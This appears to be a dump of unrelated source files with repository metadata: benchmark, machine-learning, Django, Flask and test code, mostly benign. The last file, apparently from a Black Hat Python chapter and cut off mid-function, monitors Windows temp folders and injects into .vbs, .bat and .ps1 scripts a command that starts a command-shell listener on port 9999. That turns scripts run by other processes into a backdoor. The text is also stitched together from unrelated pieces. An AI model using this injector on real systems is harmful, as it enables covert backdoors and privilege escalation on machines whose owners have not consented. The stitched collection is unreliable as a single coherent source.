continue
if a[len(a) - len(b): len(a)] == b:
print(1)
else:
print(0)
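# The same trailing-string check can be written with the built-in
# str.endswith; a minimal sketch under the same "a,b" input convention:
#     a, b = s.split(',')
#     print(1 if a.endswith(b) else 0)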
|
[
"zhuli19901106@gmail.com"
] |
zhuli19901106@gmail.com
|
bf6ba6b1402f5be62ec4a9f13ac0645075bdfe65
|
4568ff25aaafc821d18e331b0253a1246cd03c8f
|
/benchmark/experiments/basic_moo.py
|
ee9e35ecb246b008940c41dbe3f014755bedf038
|
[
"Apache-2.0"
] |
permissive
|
anyoptimization/pymoo-benchmark
|
42a7804967d03b70620d42fba5f756d288b1f6f4
|
37460f3bf0159c1113cd48d5698af6493f26ed62
|
refs/heads/main
| 2023-07-31T17:20:17.294345
| 2021-09-23T20:31:39
| 2021-09-23T20:31:39
| 387,559,302
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,882
|
py
|
import numpy as np
import scipy.stats
from prettytable import PrettyTable
from benchmark.benchmarks import get_benchmark
if __name__ == "__main__":
benchmark = get_benchmark("ucmo")
results = benchmark.run(writer=WRITER,
loader=LOADER,
run_if_loading_fails=True)
# set the igd values for each of the problems
MultiObjectiveAnalyzer().run(results, benchmark=benchmark, inplace=True)
# now aggregate all the runs to have some representative values
attrs = [("igd", np.array, "igd"),
("igd", np.mean, "avg"),
("igd", np.std, "std")]
igd = GroupBy(attrs).run(results, group_by=["problem", "algorithm"])
for scope, d in filter_by(igd, ["problem"], return_group=True):
# find the best algorithm for this problem
l = sorted(d, key=lambda x: x["avg"])
best = l[0]["igd"]
t = PrettyTable()
t.title = scope["problem"]
t.field_names = ['Algorithm', 'avg', 'std', 'shapiro', 'levene', 't-test', 'wilcoxon']
for i, e in enumerate(l):
f = e["igd"]
_, pval = scipy.stats.shapiro(f)
shapiro = "*" if pval >= 0.01 else ""
_, pval = scipy.stats.levene(best, f)
levene = "* (%.3f)" % pval if pval >= 0.05 else ""
_, pval = scipy.stats.ttest_ind(f, best, alternative="greater")
ttest = "* (%.3f)" % pval if pval >= 0.05 else ""
if len(best) == len(f):
_, pval = scipy.stats.wilcoxon(f, best, zero_method="zsplit", alternative="greater")
wilcoxon = "* (%.3f)" % pval if pval >= 0.05 else ""
else:
wilcoxon = "x"
t.add_row([e["algorithm"], "%.10f" % e["avg"], "%.10f" % e["std"], shapiro, levene, ttest, wilcoxon])
print(t)
print()
|
[
"jules89@arcor.de"
] |
jules89@arcor.de
|
68b2d9074b11197d63b539d98ae83fa80cfe4639
|
27ece9ab880a0bdba4b2c053eccda94602c716d5
|
/.history/tf_regression_logistic_20181129223556.py
|
0f19edb1cef55ba195e28ea07b0aef3180fcad9a
|
[] |
no_license
|
Symfomany/keras
|
85e3ad0530837c00f63e14cee044b6a7d85c37b2
|
6cdb6e93dee86014346515a2017652c615bf9804
|
refs/heads/master
| 2020-04-08T20:21:35.991753
| 2018-11-30T08:23:36
| 2018-11-30T08:23:36
| 159,695,807
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,338
|
py
|
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
import os, argparse
"""
Any interaction with your filesystem to save persistent data in TF needs a Saver object and a Session object.
The Saver constructor allows you to control many things among which 1 is important:
The var_list: Default to None, this is the list of variables you want to persist to your filesystem.
You can either choose to save all the variables, some variables or even a dictionary to give custom names to your variables.
The Session constructor allows you to control 3 things:
+ The var_list: This is used in case of a distributed architecture to handle computation. You can specify which TF server or ‘target’ you want to compute on.
+ The graph: the graph you want the Session to handle. The tricky thing for beginners is the fact that there is always a default Graph in TF where all operations are set by default, so you are always in a “default Graph scope”.
+ The config: You can use ConfigProto to configure TF. Check the linked source for more details.
The Saver can handle the saving and loading (called restoring) of your Graph metadata and your Variables data.
To do that, it adds operations inside the current Graph that will be evaluated within a session.
By default, the Saver will handle the default Graph and all its included Variables,
but you can create as much Savers as you want to control any graph or subgraph and their variables.
"""
dir = os.path.dirname(os.path.realpath(__file__))
def freeze_graph(model_dir, output_node_names):
"""Extract the sub graph defined by the output nodes and convert
all its variables into constant
Args:
model_dir: the root folder containing the checkpoint state file
output_node_names: a string, containing all the output node's names,
comma separated
"""
if not tf.gfile.Exists(model_dir):
raise AssertionError(
"Export directory doesn't exists. Please specify an export "
"directory: %s" % model_dir)
if not output_node_names:
print("You need to supply the name of a node to --output_node_names.")
return -1
# We retrieve our checkpoint fullpath
checkpoint = tf.train.get_checkpoint_state(model_dir)
input_checkpoint = checkpoint.model_checkpoint_path
# We precise the file fullname of our freezed graph
absolute_model_dir = "/".join(input_checkpoint.split('/')[:-1])
output_graph = absolute_model_dir + "/frozen_model.pb"
# We clear devices to allow TensorFlow to control on which device it will load operations
clear_devices = True
# We start a session using a temporary fresh Graph
with tf.Session(graph=tf.Graph()) as sess:
# We import the meta graph in the current default Graph
saver = tf.train.import_meta_graph(input_checkpoint + '.meta', clear_devices=clear_devices)
# We restore the weights
saver.restore(sess, input_checkpoint)
# We use a built-in TF helper to export variables to constants
output_graph_def = tf.graph_util.convert_variables_to_constants(
sess, # The session is used to retrieve the weights
tf.get_default_graph().as_graph_def(), # The graph_def is used to retrieve the nodes
output_node_names.split(",") # The output node names are used to select the usefull nodes
)
# Finally we serialize and dump the output graph to the filesystem
with tf.gfile.GFile(output_graph, "wb") as f:
f.write(output_graph_def.SerializeToString())
print("%d ops in the final graph." % len(output_graph_def.node))
return output_graph_def
def get_dataset():
"""
Method used to generate the dataset
"""
# Numbers of row per class
row_per_class = 100
# Generate rows
sick = np.random.randn(row_per_class, 2) + np.array([-2, -2])
sick_2 = np.random.randn(row_per_class, 2) + np.array([2, 2])
healthy = np.random.randn(row_per_class, 2) + np.array([-2, 2])
healthy_2 = np.random.randn(row_per_class, 2) + np.array([2, -2])
features = np.vstack([sick, sick_2, healthy, healthy_2])
targets = np.concatenate((np.zeros(row_per_class * 2), np.zeros(row_per_class * 2) + 1))
targets = targets.reshape(-1, 1)
return features, targets
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--model_dir", type=str, default="models", help="Model folder to export")
parser.add_argument("--output_node_names", type=str, default="tf_models", help="The name of the output nodes, comma separated.")
args = parser.parse_args()
features, targets = get_dataset()
# Plot points
#plt.scatter(features[:, 0], features[:, 1], s=40, c=targets, cmap=plt.cm.Spectral)
#plt.show()
tf_features = tf.placeholder(tf.float32, shape=[None, 2])
tf_targets = tf.placeholder(tf.float32, shape=[None, 1])
# First
w1 = tf.Variable(tf.random_normal([2, 3]))
b1 = tf.Variable(tf.zeros([3]))
# Operations
z1 = tf.matmul(tf_features, w1) + b1
a1 = tf.nn.sigmoid(z1)
# Output neuron
w2 = tf.Variable(tf.random_normal([3, 1]))
b2 = tf.Variable(tf.zeros([1]))
# Operations
z2 = tf.matmul(a1, w2) + b2
py = tf.nn.sigmoid(z2)
cost = tf.reduce_mean(tf.square(py - tf_targets))
correct_prediction = tf.equal(tf.round(py), tf_targets)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1)
train = optimizer.minimize(cost)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for e in range(100):
sess.run(train, feed_dict={
tf_features: features,
tf_targets: targets
})
print("accuracy =", sess.run(accuracy, feed_dict={
tf_features: features,
tf_targets: targets
}))
# We can check easily that we are indeed in the default graph
print(z1.graph == tf.get_default_graph())
# By default, the Saver handles every Variables related to the default graph
all_saver = tf.train.Saver()
all_saver.save(sess, args.model_dir + '/data')
# freeze_graph(args.model_dir, args.output_node_names)
|
[
"julien@meetserious.com"
] |
julien@meetserious.com
|
4fc460384c0da2849c8cd81e53c14410411469db
|
1bf1a8d115d9720dacb84b5c8fefb49af015c295
|
/backend/soft_sound_26327/wsgi.py
|
d82dfa567ac94e3653dfc6d99f1fb57752c26fe4
|
[] |
no_license
|
crowdbotics-apps/soft-sound-26327
|
dba9358659d899d485a0b10cd63e41c68e865e22
|
5d35e9d5bd2cdad5ab5e5f2a95d8190ce367ff43
|
refs/heads/master
| 2023-04-11T15:35:04.366308
| 2021-05-07T12:50:17
| 2021-05-07T12:50:17
| 365,231,981
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
WSGI config for soft_sound_26327 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'soft_sound_26327.settings')
application = get_wsgi_application()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
9379f75d7a6e72f76b8b8000d917229c05095694
|
ceead28beb1ea6cb56a2bb4472bc1d2396b39e6f
|
/gen_basis_helpers/lammps_interface/unit_tests/utests_calc_objs.py
|
e7ea97f5225ee65c88ea89d7726bdc7ec75871d3
|
[] |
no_license
|
RFogarty1/plato_gen_basis_helpers
|
9df975d4198bff7bef80316527a8086b6819d8ab
|
8469a51c1580b923ca35a56811e92c065b424d68
|
refs/heads/master
| 2022-06-02T11:01:37.759276
| 2022-05-11T12:57:40
| 2022-05-11T12:57:40
| 192,934,403
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,352
|
py
|
import copy
import collections
import os
import unittest
import unittest.mock as mock
import gen_basis_helpers.lammps_interface.lammps_calc_objs as tCode
class TestCalcObjStandard(unittest.TestCase):
def setUp(self):
self.baseFolder = "fake_path"
self.baseFileName = "test_file"
self.dataFileOrderedDict = collections.OrderedDict([["fake_header","fake_val"]])
self.scriptFileOrderedDict = collections.OrderedDict([["read_data","datafile"],["commA","valA"]])
self.createTestObjs()
def createTestObjs(self):
argList = [self.baseFolder, self.baseFileName, self.dataFileOrderedDict, self.scriptFileOrderedDict]
self.testObjA = tCode.LammpsCalcObjStandard(*argList)
def testScriptFilePathAsExpected(self):
expPath = os.path.join(self.baseFolder, self.baseFileName) + ".in"
actPath = self.testObjA.scriptFilePath
self.assertEqual(expPath,actPath)
def testDataFilePathAsExpected(self):
expPath = os.path.join(self.baseFolder, self.baseFileName) + ".data"
actPath = self.testObjA.dataFilePath
self.assertEqual(expPath,actPath)
@mock.patch("gen_basis_helpers.lammps_interface.lammps_calc_objs.fileIoHelp")
@mock.patch("gen_basis_helpers.lammps_interface.lammps_calc_objs.pathlib")
@mock.patch("gen_basis_helpers.lammps_interface.lammps_calc_objs.LammpsCalcObjStandard.dataFilePath", new_callable=mock.PropertyMock)
@mock.patch("gen_basis_helpers.lammps_interface.lammps_calc_objs.LammpsCalcObjStandard.scriptFilePath", new_callable=mock.PropertyMock)
def testWriteFileCallsExpected(self, mockScriptPathProp, mockDataPathProp, mockedPathLib, mockedFileIo):
expScriptPath, expDataPath = "script_path", "data_path"
mockScriptPathProp.return_value = expScriptPath
mockDataPathProp.return_value = expDataPath
expScriptDict = copy.deepcopy(self.scriptFileOrderedDict)
expScriptDict["read_data"] = expDataPath #Really only needs the fileName rather than path
self.testObjA.writeFile()
mockedPathLib.Path.assert_called_with(self.baseFolder)
mockedFileIo.writeScriptFileFromTokens.assert_called_with(expScriptPath, self.scriptFileOrderedDict)
mockedFileIo.writeDataFileFromTokens.assert_called_with(expDataPath, self.dataFileOrderedDict)
@mock.patch("gen_basis_helpers.lammps_interface.lammps_calc_objs.LammpsCalcObjStandard.scriptFilePath", new_callable=mock.PropertyMock)
def testExpectedRunComm(self, mockedScriptPath):
expScriptPath = "some_dir/test_script_path"
mockedScriptPath.return_value = expScriptPath
expRunComm = "lmp -in test_script_path"
actRunComm = self.testObjA.runComm
self.assertEqual(expRunComm,actRunComm)
class TestScriptFileOptsStandard(unittest.TestCase):
def setUp(self):
self.initOpts = collections.OrderedDict([["initOptKey","initOptVal"]])
self.setupBox = collections.OrderedDict([["setupBoxKey","setupBoxVal"]])
self.setupAtoms = collections.OrderedDict([["setupAtomsKey","setupAtomsVal"]])
self.forceFieldOpts = collections.OrderedDict([["forceFieldKey","forceFieldVal"]])
self.settingsOpts = collections.OrderedDict([["settingsKey","settingsVal"]])
self.fixOpts = collections.OrderedDict([["fixKey","fixVals"]])
self.outputSection = collections.OrderedDict([["outputKey","outputVal"]])
self.createTestObjs()
def createTestObjs(self):
kwargDict = {"initOpts": self.initOpts, "setupBox": self.setupBox,
"setupAtoms": self.setupAtoms, "forceFieldOpts": self.forceFieldOpts,
"settingsOpts": self.settingsOpts, "fixSection": self.fixOpts,
"outputSection": self.outputSection}
self.testObjA = tCode.ScriptFileOptionsStandard(**kwargDict)
def testExpectedDict_allOptsSet(self):
expDict = self._loadExpectedDictA()
actDict = self.testObjA.getOutputDict()
self.assertEqual(expDict,actDict)
def testExpectedDict_fixOptsNotSet(self):
self.fixOpts = None
self.createTestObjs()
expDict = self._loadExpectedDictA()
expDict.pop("fixKey")
actDict = self.testObjA.getOutputDict()
self.assertEqual(expDict, actDict)
def _loadExpectedDictA(self):
expDict = collections.OrderedDict()
expDict["initOptKey"] = "initOptVal"
expDict["setupBoxKey"] = "setupBoxVal"
expDict["setupAtomsKey"] = "setupAtomsVal"
expDict["forceFieldKey"] = "forceFieldVal"
expDict["settingsKey"] = "settingsVal"
expDict["fixKey"] = "fixVals"
expDict["outputKey"] = "outputVal"
return expDict
|
[
"richard.m.fogarty@gmail.com"
] |
richard.m.fogarty@gmail.com
|
b79d0c78af023ef7ed30861159fed93a15561056
|
8acffb8c4ddca5bfef910e58d3faa0e4de83fce8
|
/ml-flask/Lib/site-packages/networkx/utils/random_sequence.py
|
8b85ab0377cfc422b3d928447eefc64534d09e7d
|
[
"MIT"
] |
permissive
|
YaminiHP/SimilitudeApp
|
8cbde52caec3c19d5fa73508fc005f38f79b8418
|
005c59894d8788c97be16ec420c0a43aaec99b80
|
refs/heads/master
| 2023-06-27T00:03:00.404080
| 2021-07-25T17:51:27
| 2021-07-25T17:51:27
| 389,390,951
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:c5e599427c932f0d245045fe663be170579a4a231663b09977410234d4901ef6
size 4085
|
[
"yamprakash130@gmail.com"
] |
yamprakash130@gmail.com
|
820179af2252cd5b64438e6edfc4fb743ccbba98
|
9c5cbe763edf9b2857fc4d3a01b0ffd84f84732c
|
/courses/urls.py
|
736f7edd62c9a9ee82e1c68ae04a7a86a4289af0
|
[] |
no_license
|
miclemabasie/Django-Elearn
|
943dda71f19cebe73afc8b22858b016065848987
|
b69ccd40719bef63ce4ff8d16262552db78dfdce
|
refs/heads/main
| 2023-07-30T04:50:40.484172
| 2021-09-22T17:56:08
| 2021-09-22T17:56:08
| 408,752,595
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('mine/',
views.ManageCourseListView.as_view(),
name='manage_course_list'
),
path('create/',
views.CourseCreateView.as_view(),
name='course_create'
),
path('<pk>/edit/',
views.CourseUpdateView.as_view(),
name='course_edit'
),
path('<pk>/delete/',
views.CourseDeleteView.as_view(),
name='course_delete'
),
path('<pk>/module/',
views.CourseModuleUpdate.as_view(),
name='course_module_update'
),
path('module/<int:module_id>/content/<model_name>/create/',
views.ContentCreateUpdateView.as_view(),
name='module_content_create'
),
path('module/<int:module_id>/content/<model_name>/<id>/',
views.ContentCreateUpdateView.as_view(),
name='module_content_update'
),
path('content/<int:id>/delete/',
views.ContentDeleteView.as_view(),
name='module_content_delete'
),
path('module/<int:module_id>/',
views.ModuleContentListView.as_view(),
name='module_content_list'
),
]
|
[
"miclemabasie3@gmail.com"
] |
miclemabasie3@gmail.com
|
ee9757768aa20d43a6d7e774315d16995cd75ed6
|
2f76da1ab7d6b8ea0184c5ad2c522518ab37823f
|
/speech_parts.py
|
8dbd9e71f75a67ca948bd7b45c8c6483afb8d9a2
|
[] |
no_license
|
abezgauzdina/knesset-data-committees
|
4ebdddd0d5ec868b1f2037c66be2dd752431ca10
|
d80346aae116365d9959fb48ad1f58666d04f020
|
refs/heads/master
| 2021-09-15T07:39:53.205577
| 2017-11-29T09:54:03
| 2017-11-29T09:54:03
| 115,918,597
| 0
| 0
| null | 2018-04-23T19:45:32
| 2018-01-01T12:43:43
|
CSS
|
UTF-8
|
Python
| false
| false
| 1,906
|
py
|
from tabulator import Stream
import os, requests, logging, re, json
def get_speech_part_body(speech_part):
return speech_part["body"].replace("\n", "<br/>")
def get_speech_parts_stream(**kwargs):
stream = Stream(**kwargs)
stream.open()
if stream.headers == ['header', 'body']:
return stream
else:
return None
def get_speech_parts_source(meeting, parts_url):
if os.environ.get("ENABLE_LOCAL_CACHING") == "1":
parts_file = "data/minio-cache/committees/{}".format(meeting["parts_object_name"])
if not os.path.exists(parts_file):
os.makedirs(os.path.dirname(parts_file), exist_ok=True)
with open(parts_file, "wb") as f:
f.write(requests.get(parts_url).content)
return "file", parts_file
else:
return "url", parts_url
def get_speech_part_contexts(stream):
for order, row in enumerate(stream):
if not row:
header, body = "", ""
elif len(row) == 2:
header, body = row
else:
header, body = "", str(row)
yield {"order": order,
"header": header,
"body": body}
def get_speech_parts(meeting):
source_type, source = None, None
if meeting["parts_object_name"]:
parts_url = "https://minio.oknesset.org/committees/{}".format(meeting["parts_object_name"])
try:
source_type, source = get_speech_parts_source(meeting, parts_url)
stream = get_speech_parts_stream(source=source, headers=1)
if stream:
yield from get_speech_part_contexts(stream)
stream.close()
except Exception:
logging.exception("Failed to get speech parts for {}".format(meeting["parts_object_name"]))
if source_type == "file" and os.path.exists(source):
os.unlink(source)
raise
|
[
"ori@uumpa.com"
] |
ori@uumpa.com
|
0f2b5f1b67de643723f3d4cb34ec4d21663d34ba
|
3775102a3f59bc8aac9b8121ba2aef87409724ee
|
/Easy/slang_flavor.py
|
33034c354656685515600b8a5be64b39de275dec
|
[] |
no_license
|
csikosdiana/CodeEval
|
a446ec6673e9f97439662bfccbd7454e5740d509
|
15cdd9ca454939e93c77d5ed5076595ecc7e4301
|
refs/heads/master
| 2016-08-11T14:49:27.565799
| 2016-03-22T17:48:20
| 2016-03-22T17:48:20
| 46,176,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 852
|
py
|
data = ["Lorem ipsum dolor sit amet. Mea et habeo doming praesent. Te inani utroque recteque has, sea ne fugit verterem!",
"Usu ei scripta phaedrum, an sed salutatus definiebas? Qui ut recteque gloriatur reformidans. Qui solum aeque sapientem cu.",
"Eu nam nusquam quaestio principes."]
slang = [", yeah!", ", this is crazy, I tell ya.", ", can U believe this?", ", eh?",
", aw yea.", ", yo.", "? No way!", ". Awesome!"]
#import sys
#test_cases = open(sys.argv[1], 'r')
#data = test_cases.readlines()
position = 0
s = 0
for test in data:
test = test.rstrip()
text = ""
for i in test:
if s == len(slang):
s = 0
if ((i == ".") or (i == "!") or (i == "?")):
position += 1
if position % 2 == 0:
t = slang[s]
s += 1
text = text + t
else:
text = text + i
else:
text = text + i
    print(text)
#test_cases.close()
|
[
"csikosdiana@gmail.com"
] |
csikosdiana@gmail.com
|
7f6bcb9e8da7fe2b36ab5738310c1dc96aa599b5
|
5774101105b47d78adb7a57eefdfa21502bbd70c
|
/python框架/flask/Flask-RESTful/s3_error404定制.py
|
73259f73985c047a86f46f7e8b642e2a561425ae
|
[] |
no_license
|
zhlthunder/python-study
|
34d928f0ebbdcd5543ae0f41baaea955c92f5c56
|
0f25dd5105ba46791842d66babbe4c3a64819ee5
|
refs/heads/master
| 2023-01-12T18:39:47.184978
| 2018-10-07T23:48:04
| 2018-10-07T23:48:04
| 90,516,611
| 0
| 1
| null | 2022-12-26T19:46:22
| 2017-05-07T07:39:48
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,234
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:zhl
#refer:https://blog.csdn.net/dream_flying_bj/article/details/61198475
# Install: pip3 install flask-restful
## Usage reference: pip3 install flask-restful
from flask import Flask, jsonify
from flask import abort
from flask import make_response
app = Flask(__name__)
tasks = [
{
'id': 1,
'title': u'Buy groceries',
'description': u'Milk, Cheese, Pizza, Fruit, Tylenol',
'done': False
},
{
'id': 2,
'title': u'Learn Python',
'description': u'Need to find a good Python tutorial on the web',
'done': False
}
]
@app.errorhandler(404)  ## Any other non-existent URL is routed here as well; the only open question is whether the "if not len(list(task))" branch can redirect here - approach to be confirmed
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])
def get_task(task_id):
    # A list avoids consuming a filter() iterator twice
    task = [t for t in tasks if t['id'] == task_id]
    if not task:
        abort(404)  # handled by not_found() above
    return jsonify({'task': task[0]})
if __name__ == '__main__':
app.run(debug=True)
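# Quick check, assuming the default Flask dev server on port 5000:
#     curl http://127.0.0.1:5000/todo/api/v1.0/tasks/1
#     curl http://127.0.0.1:5000/todo/api/v1.0/tasks/99   # -> {"error": "Not found"}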
|
[
"zhlthunder@163.com"
] |
zhlthunder@163.com
|
34ae6b4403ac4a915276300f832032a92bc1afc5
|
39978dba83181975b29b884d1e9cc22ed32bb097
|
/prepare_data.py
|
f7b2f6f0058a5a59c0c89ca56f3718faa720435d
|
[
"MIT"
] |
permissive
|
Blarc/lol-dodge-predictor
|
c3e5050c577eb003d960941f8f601545de8a6abd
|
01ac9ce1f117dba7f2375958f96fd1336cc0049d
|
refs/heads/main
| 2023-02-08T11:01:01.435267
| 2021-01-04T14:21:38
| 2021-01-04T14:21:38
| 311,631,559
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,158
|
py
|
import copy
import json
import cassiopeia as cass
import pandas as pd
from IPython.display import clear_output
from roleidentification import get_roles, pull_data
NUMBER_OF_LINES = 108941
champion_roles = pull_data()
champions_mapper = {champion.id: champion.name for champion in cass.get_champions("EUW")}
summoners = {}
matches = {}
summoners_columns_mapper = {
'total_games': 0,
'wins': 1
}
role_index_mapper = {
'TOP': 0,
'JUNGLE': 1,
'MIDDLE': 2,
'BOTTOM': 3,
'UTILITY': 4
}
columns_by_role = ['kills', 'deaths', 'assists', 'gold_earned', 'total_damage_dealt_to_champions',
'total_minions_killed', 'vision_score', 'vision_wards_bought', 'total_games', 'wins']
index = len(summoners_columns_mapper)
for role_name in role_index_mapper.keys():
for column in columns_by_role:
column_key = role_name + '_' + column
summoners_columns_mapper[column_key] = index
index += 1
columns_mapper = {}
index = 0
matches_index = 0
with open('data/raw_data/match_all_merged_sorted.csv', encoding='utf8') as infile:
for line in infile:
split = line.rstrip('\n').split(';')
if index == 0:
columns_mapper = {key: value for value, key in enumerate(split)}
index += 1
continue
queue_id = float(split[columns_mapper['queueId']])
if queue_id != 420:
index += 1
continue
game_duration = float(split[columns_mapper['gameDuration']])
participant_identities = json.loads(split[columns_mapper['participantIdentities']] \
.replace('\'', '\"'))
participants = json.loads(split[columns_mapper['participants']] \
.replace('\'', '\"') \
.replace('False', '0') \
.replace('True', '1'))
champions = []
for participant in participants:
champions.append(participant['championId'])
roles = list(get_roles(champion_roles, champions[0:5]).items())
roles += list(get_roles(champion_roles, champions[5:10]).items())
teams = {
100: [None] * 5,
200: [None] * 5
}
win_dict = {}
for participantIdentity, participant, role in zip(participant_identities, participants, roles):
summoner_id = participantIdentity['player']['summonerId']
team_id = participant['teamId']
role_name = role[0]
role_index = role_index_mapper[role[0]]
participant_stats = participant['stats']
win = participant_stats['win']
kills = participant_stats['kills']
deaths = participant_stats['deaths']
assists = participant_stats['assists']
gold_earned = participant_stats['goldEarned']
total_damage_dealt_to_champions = participant_stats['totalDamageDealtToChampions']
total_minions_killed = participant_stats['totalMinionsKilled']
vision_score = participant_stats['visionScore']
vision_wards_bought = participant_stats['visionWardsBoughtInGame']
if summoner_id not in summoners:
summoners[summoner_id] = {key: 0 for key in summoners_columns_mapper}
summoners[summoner_id]['wins'] += win
summoners[summoner_id]['total_games'] += 1
summoners[summoner_id][role_name + '_wins'] += win
summoners[summoner_id][role_name + '_total_games'] += 1
summoners[summoner_id][role_name + '_kills'] += kills / game_duration * 60
summoners[summoner_id][role_name + '_deaths'] += deaths / game_duration * 60
summoners[summoner_id][role_name + '_assists'] += assists / game_duration * 60
summoners[summoner_id][role_name + '_gold_earned'] += gold_earned / game_duration * 60
summoners[summoner_id][
role_name + '_total_damage_dealt_to_champions'] += total_damage_dealt_to_champions / game_duration * 60
summoners[summoner_id][role_name + '_total_minions_killed'] += total_minions_killed / game_duration * 60
summoners[summoner_id][role_name + '_vision_score'] += vision_score / game_duration * 60
summoners[summoner_id][role_name + '_vision_wards_bought'] += vision_wards_bought / game_duration * 60
summoner = copy.deepcopy(summoners[summoner_id])
for role_label in role_index_mapper.keys():
total_games = summoner[role_label + '_total_games']
if total_games == 0:
total_games += 1
summoner[role_label + '_wins'] /= total_games
summoner[role_label + '_kills'] /= total_games
summoner[role_label + '_deaths'] /= total_games
summoner[role_label + '_assists'] /= total_games
summoner[role_label + '_gold_earned'] /= total_games
summoner[role_label + '_total_damage_dealt_to_champions'] /= total_games
summoner[role_label + '_total_minions_killed'] /= total_games
summoner[role_label + '_vision_score'] /= total_games
summoner[role_label + '_vision_wards_bought'] /= total_games
teams[team_id][role_index] = summoner
win_dict[team_id] = participant['stats']['win']
for team, win in zip(teams.values(), win_dict.values()):
match = {}
for role, player in zip(role_index_mapper.keys(), team):
for key, value in player.items():
match[role + '_' + key] = value
match['win'] = win
matches[matches_index] = match
matches_index += 1
clear_output(wait=True)
print(f'{index} / {NUMBER_OF_LINES}')
index += 1
# expected output: 156344 matches
print(f'Number of matches: {len(matches)}')
print('Saving to csv...')
pd.DataFrame.from_dict(data=matches, orient='index').to_csv('data/processed_data/matches_sorted.csv', header=True)
print('Saved to \'data/processed_data/matches_sorted.csv\'')
|
[
"jakob.malezic@gmail.com"
] |
jakob.malezic@gmail.com
|
5eaa86000cf6a4bf50b9794b70c14cebc088bf10
|
77311ad9622a7d8b88707d7cee3f44de7c8860cb
|
/res/scripts/client/gui/scaleform/daapi/view/meta/channelwindowmeta.py
|
e1885ab5d56862c3eeb542f57abc2cdbefe16faf
|
[] |
no_license
|
webiumsk/WOT-0.9.14-CT
|
9b193191505a4560df4e872e022eebf59308057e
|
cfe0b03e511d02c36ce185f308eb48f13ecc05ca
|
refs/heads/master
| 2021-01-10T02:14:10.830715
| 2016-02-14T11:59:59
| 2016-02-14T11:59:59
| 51,606,676
| 0
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 531
|
py
|
# 2016.02.14 12:40:13 Central Europe (Standard Time)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/ChannelWindowMeta.py
from gui.Scaleform.framework.entities.abstract.AbstractWindowView import AbstractWindowView
class ChannelWindowMeta(AbstractWindowView):
pass
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\scaleform\daapi\view\meta\channelwindowmeta.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.02.14 12:40:13 Central Europe (Standard Time)
|
[
"info@webium.sk"
] |
info@webium.sk
|
e43c2f5632fe67304382d4e6a716df7a051baa2b
|
8fd2e5d53d7a91d35288ccefdb0c7ef00d927a0a
|
/book_06_Python黑帽子/Chapter10/my_file_monitor.py
|
82f21f92c9aff7909f4483eadae1363b1c57daa3
|
[] |
no_license
|
atlasmao/Python-book-code
|
03501f9ca2e81bc1f47464b3227c7f9cda0d387c
|
03b6848a15a7e4c2ffebdc3528c24a8b101d9f41
|
refs/heads/master
| 2022-01-06T23:45:21.951307
| 2019-07-11T10:32:22
| 2019-07-11T10:32:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,780
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Monitor temporary files for creation, read/write, and deletion
import tempfile
import threading
import win32file
import win32con
import os
# Typical directories where temporary files live
dirs_to_monitor = ["C:\\WINDOWS\\Temp", tempfile.gettempdir()]
# Constants corresponding to file-modification actions
FILE_CREATED = 1
FILE_DELETED = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5
file_types = {}
command = "C:\\WINDOWS\\TEMP\\bhpnet.exe -l -p 9999 -c"
file_types['.vbs'] = ["\r\n'bhpmarker\r\n", "\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n" % command]
file_types['.bat'] = ["\r\nREM bhpmarker\r\n", "\r\n%s\r\n" % command]
file_types['.ps1'] = ["\r\n#bhpmarker", "Start-Process \"%s\"" % command]
# Routine that performs the code injection
def inject_code(full_filename, extension, contents):
    # Check whether the file already carries the marker
if file_types[extension][0] in contents:
return
    # If not, inject the code and add the marker
full_contents = file_types[extension][0]
full_contents += file_types[extension][1]
full_contents += contents
fd = open(full_filename, 'wb')
fd.write(full_contents)
fd.close()
print "[\o/] Injected code."
return
def start_monitor(path_to_watch):
    # One thread is spawned per monitored directory
FILE_LIST_DIRECTORY = 0x0001
h_directory = win32file.CreateFile(
path_to_watch,
FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
None,
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS,
None
)
while 1:
try:
results = win32file.ReadDirectoryChangesW(
h_directory,
1024,
True,
win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
win32con.FILE_NOTIFY_CHANGE_SIZE |
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
